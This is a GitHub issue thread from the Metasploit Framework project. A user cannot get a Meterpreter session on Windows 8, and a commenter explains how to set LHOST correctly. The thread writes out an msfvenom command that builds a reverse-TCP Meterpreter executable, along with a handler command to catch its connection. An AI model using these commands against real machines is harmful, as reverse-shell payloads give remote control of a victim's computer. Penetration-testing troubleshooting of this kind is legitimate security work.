### ISSUE TITLE
metasploit not created sessions in win 8 

### ISSUE THREAD

**Issue by ALLERRORr** [rapid7/metasploit-framework#11265]
I already tried everything a little but it's not right

1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=localhost LPORT=1234 -f exe > testing.exe
payload created sucess

2 msfconsole handler -H 127.0.0.1 -P 1234 -p windows/meterpreter/reverse_tcp /// and press enter

3 handler listing 127.0.0.1:1234 but no sessions as created .ok

4 i click in my payload testing.exe and he not response ? 

5 tested in metasploit framework 5.0.1 and in metasploit framework 4.17.35 work fine

6 system win 8 

7 framework used 5.0.1

**Comment by cbrnrd** [comment]
when setting `LHOST` you want to set it to the IP address of the machine running the handler (not localhost/127.0.0.1)

**Comment by ALLERRORr** [comment]
yes i tested localhost and 127.0.0.1 more nothing

**Comment by ALLERRORr** [comment]
I do not know what I can do.
